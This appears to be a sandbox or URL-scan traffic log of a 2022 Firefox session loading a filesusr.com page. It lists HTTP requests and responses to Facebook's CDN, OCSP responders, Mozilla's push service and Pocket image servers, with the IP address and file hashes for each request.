GET /rsrc.php/v3/yp/l/0,cross/SieMvexb4RV.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/yp/l/0,cross/SieMvexb4R (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: p+xxVY+PH4smgDWPhn57tVNAOo1SUdkOVoLJXvVYzzGSbPo7law4h6nLdEWVkUR568KLhemDr8g9tPk+CiwS/Q== content-length: 0 priority: u=3,i x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: YtYPmDReaFGatQUeGlFhldhupVG2lWHtJP5KSPV/+TlIvyFqXcLmyce+ltzLYS+bQmyyIIv0QIn95cUMzWUisw== content-length: 0 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-SSjEW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://facebookbeatrizz.filesusr.com Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: static.xx.fbcdn.net/rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-S (...) FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 31.13.72.12 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: cNRkbQHe0XNpa2wb/OQh8VSKRKdX3DnuqixMlGI5WnQqYQ2ajG1Dlc1dYYhhLDWMuvkylPCtO5FJNnZPv65c0Q== content-length: 0 priority: u=3,i x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 09604aed7cbca7971bfcb5afcb53591600b944f28eff21aa65dc601e78cdda53 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 6104 Cache-Control: 'max-age=158059' Date: Thu, 29 Sep 2022 08:36:04 GMT Last-Modified: Thu, 29 Sep 2022 06:54:20 GMT Server: ECS (ska/F708) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 3526d5ce1381ba26cbc553db057e1915 Sha1: fe01c920696448e8bf12e6fff877bce8281d34a2 Sha256: 09604aed7cbca7971bfcb5afcb53591600b944f28eff21aa65dc601e78cdda53
GET /rsrc.php/y8/r/dF5SId3UHWd.svg HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site TE: trailers	URL: static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg FQDN: static.xx.fbcdn.net IP: 31.13.72.12 HASH: 436bb968741d670e68050258e3544afccd828ff52cc55077577ff67f5e058e55 31.13.72.12 HTTP/2 200 OK content-type: image/svg+xml vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Sun, 17 Sep 2023 00:00:49 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: NiMA5zHIsmaYxSYEaw9fHg== x-fb-debug: H+2lSyBg+yFwZfvEQ8AagkTj6m0yDJIp6AsH122a3Mar+bWBeRK4XmkKNGMoaD4TFXtVi8HgQwN63fXYcBKrGg== priority: u=3,i content-length: 1027 x-fb-trip-id: 1904183273 date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400,h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: SVG Scalable Vector Graphics image\012- HTML document text\012- HTML document, ASCII text, with very long lines (2384) Size: 1027 Md5: 362300e731c8b26698c526046b0f5f1e Sha1: 6cd41a329b54f1fb112080237f7fb4dc32d19a10 Sha256: 436bb968741d670e68050258e3544afccd828ff52cc55077577ff67f5e058e55
GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: 5C3qchabqYiPx7km8PF/4g== Connection: keep-alive, Upgrade Sec-Fetch-Dest: websocket Sec-Fetch-Mode: websocket Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache Upgrade: websocket	URL: push.services.mozilla.com/ FQDN: push.services.mozilla.com IP: 35.163.147.190 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 35.163.147.190 HTTP/1.1 101 Switching Protocols Connection: Upgrade Upgrade: websocket Sec-WebSocket-Accept: rUJ/+Y6asAf6W06sdtwZ9onoA3U= --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A37AFAFC8EE712AE7AE935D3ED564F3CF46DD09005DEBBC5E2650F8B434D1E00" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=20287 Expires: Thu, 29 Sep 2022 14:14:12 GMT Date: Thu, 29 Sep 2022 08:36:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 139d64e28724086d1d5ab6d2f534ff25 Sha1: 2c717905e83564a17bd8ca61dd934133416f629b Sha256: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A37AFAFC8EE712AE7AE935D3ED564F3CF46DD09005DEBBC5E2650F8B434D1E00" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=20287 Expires: Thu, 29 Sep 2022 14:14:12 GMT Date: Thu, 29 Sep 2022 08:36:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 139d64e28724086d1d5ab6d2f534ff25 Sha1: 2c717905e83564a17bd8ca61dd934133416f629b Sha256: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "A37AFAFC8EE712AE7AE935D3ED564F3CF46DD09005DEBBC5E2650F8B434D1E00" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=20287 Expires: Thu, 29 Sep 2022 14:14:12 GMT Date: Thu, 29 Sep 2022 08:36:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 139d64e28724086d1d5ab6d2f534ff25 Sha1: 2c717905e83564a17bd8ca61dd934133416f629b Sha256: a37afafc8ee712ae7ae935d3ed564f3cf46dd09005debbc5e2650f8b434d1e00
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F99f26bb4-2c5c-44ef-86d3-90fd05ec1ce0.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 99984d108bf31d733414f7f1352e17225ac21ac2dbfb4b1e7fa7ae80e5b6b822 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 9654 x-amzn-requestid: 7961f184-9476-43de-bf35-8ccb50ee1760 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZGVYsHA6oAMFvRA= x-content-type-options: nosniff x-amzn-trace-id: Root=1-63326904-05f567f7606462ac44f89987;Sampled=0 x-amzn-remapped-date: Tue, 27 Sep 2022 03:07:48 GMT x-amz-cf-pop: SEA73-P1 x-cache: Miss from cloudfront x-amz-cf-id: XaB4TwXv4xy0Sy3dncNYZWEPEnHY5BkEHR7fZDK59APYkzH9DPdT7A== via: 1.1 a4fe306096165bb1e86e69365dc8fac2.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google date: Thu, 29 Sep 2022 04:20:40 GMT age: 15325 etag: "44cc19b21912d07f82a88af5b2fa6d3e370459bf" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 9654 Md5: 36ae9444071dd70dcf86802c370ffda9 Sha1: 44cc19b21912d07f82a88af5b2fa6d3e370459bf Sha256: 99984d108bf31d733414f7f1352e17225ac21ac2dbfb4b1e7fa7ae80e5b6b822
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe91221c7-ce03-4ea5-9826-7a53eaafc5e6.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: eabd1bfef29cad4045d688a909b9a8c88818d80bb432ce642d055583cf66d77d 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 9002 x-amzn-requestid: 0623931b-a4d6-49de-ba32-d071c08eddbd x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMKoiGKRIAMFhYQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be36-1573e2e91c85617424db019f;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:35:50 GMT x-amz-cf-pop: SEA73-P2, SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: mmSMfKcxGrh9meSHTynf1wRZLrzc4wejFbKSO6qaJ3hn8h4-QwAAcQ== via: 1.1 2a44ef7b9d28e74c78ffadeedcbb887c.cloudfront.net (CloudFront), 1.1 ead78c395f4bede3ec6cd7ea180e3d3a.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 21:50:26 GMT age: 38739 etag: "d76293673a7aa2861b069ced614cdcdb84fed6d3" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 9002 Md5: c80d7ce8a9d3fba54855e05731db759c Sha1: d76293673a7aa2861b069ced614cdcdb84fed6d3 Sha256: eabd1bfef29cad4045d688a909b9a8c88818d80bb432ce642d055583cf66d77d
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F75de31dd-bbf0-4a21-bfac-94f0062f4da4.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: b5e79054f165f38b99f93a8128284f82076523988aeb102b85dd8ff1a2870d00 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 10023 x-amzn-requestid: 0cb6b9a1-0707-4094-b197-5a0add2df717 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMK4dHJLIAMFWmg= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be9c-2d8bbb17157900f126c5bb3c;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:32 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: wZ2hBqHAdwimAVV3p-CJFrb9zQ-CTN5ar9CB-cu0mZoENYUFTKKPWQ== via: 1.1 c7c3cdef911c9ee3c1a83a78f425dc5a.cloudfront.net (CloudFront), 1.1 ddaf46a95abcfc80e8eae76235e2127c.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 22:04:58 GMT age: 37867 etag: "e1067a2dfbc22e7eb196046d57bd1e17604dba75" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 10023 Md5: f4505f57697072468da82e0b536d0d5b Sha1: e1067a2dfbc22e7eb196046d57bd1e17604dba75 Sha256: b5e79054f165f38b99f93a8128284f82076523988aeb102b85dd8ff1a2870d00
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff5cbaf6d-fc16-4449-8b54-1d55f68eff4f.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 511f5aa33750cd4a02cf3968bf165ffa521e77cb4fb7135b516d7ad14e8b9d01 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 14073 x-amzn-requestid: 4ff72590-e28d-4d4b-af1a-4d62e75e3d66 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMKnpEsJoAMFlBQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be30-38b014a25551aa0a2ab04ccf;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:35:44 GMT x-amz-cf-pop: HIO50-C1, SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: dyDhatfeYzzSQpRY7JpOIu3VhjlI8IOWcKCLCBWYaxJ1CYgCxqdQjA== via: 1.1 efe54e8b68e074d39b2ecd249f85100a.cloudfront.net (CloudFront), 1.1 567b44ed19c8caed2570b7bcd8c70034.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 21:49:42 GMT age: 38783 etag: "72603efba82d649ce5a7a0ca45dc830c0d9ef012" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 14073 Md5: 11594ce7500d8776bfd5162b17f87d72 Sha1: 72603efba82d649ce5a7a0ca45dc830c0d9ef012 Sha256: 511f5aa33750cd4a02cf3968bf165ffa521e77cb4fb7135b516d7ad14e8b9d01
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6362b4f1-5935-43c9-9147-6d019a1ea6cd.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 967e070aec3942c64cc6c4cfdc13d430825c9e5c26dbec5bb3d66237d5978dfc 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 4235 x-amzn-requestid: 60825c64-7743-4b16-b80d-d1195ccb0f23 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZMK2nFsDoAMFRwg= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6334be90-1898e5d9111db7c843c1ebb4;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 21:37:20 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: C-XC9qsktkENdI6lWZp5RQjeEvrrFMUfBq1mA5dxEjRq5tkfL5Jsxw== via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 ee8246c5442dace7525c74f6a799bb46.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 22:04:55 GMT age: 37870 etag: "2bbcd6305b4da3204bf1c04b6db23d44cfc84fbb" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 4235 Md5: 30471179bd7cdeecea2fa4ea98701aef Sha1: 2bbcd6305b4da3204bf1c04b6db23d44cfc84fbb Sha256: 967e070aec3942c64cc6c4cfdc13d430825c9e5c26dbec5bb3d66237d5978dfc
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb46b76b4-e585-46c3-bf03-5bfe9273000c.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 8c25b9129fc01f6ffad911994e91436ab0026ed0b54568757a20ab7f92584467 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 3332 x-amzn-requestid: fb6cb616-5b4d-4aaf-a891-50b4de8b6f95 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZJ_6AGNYIAMFSHQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6333e03f-377fe02d1cc7ad2b3a15ca1a;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 05:48:47 GMT x-amz-cf-pop: SEA19-C2 x-cache: Miss from cloudfront x-amz-cf-id: nJJZxZlapt4k5988yU-V94pBBH2SmfSZ0Zb_oJXA07mppg0lF04wLg== via: 1.1 e5af640ced3aa8764b82c4bc3f7af38e.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 17:18:10 GMT age: 55075 etag: "4fc0699c763f67a2602b4b3f46b8b4013d2049c6" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 3332 Md5: 6ac86079d2901fb11bfaff81d91bb2d2 Sha1: 4fc0699c763f67a2602b4b3f46b8b4013d2049c6 Sha256: 8c25b9129fc01f6ffad911994e91436ab0026ed0b54568757a20ab7f92584467
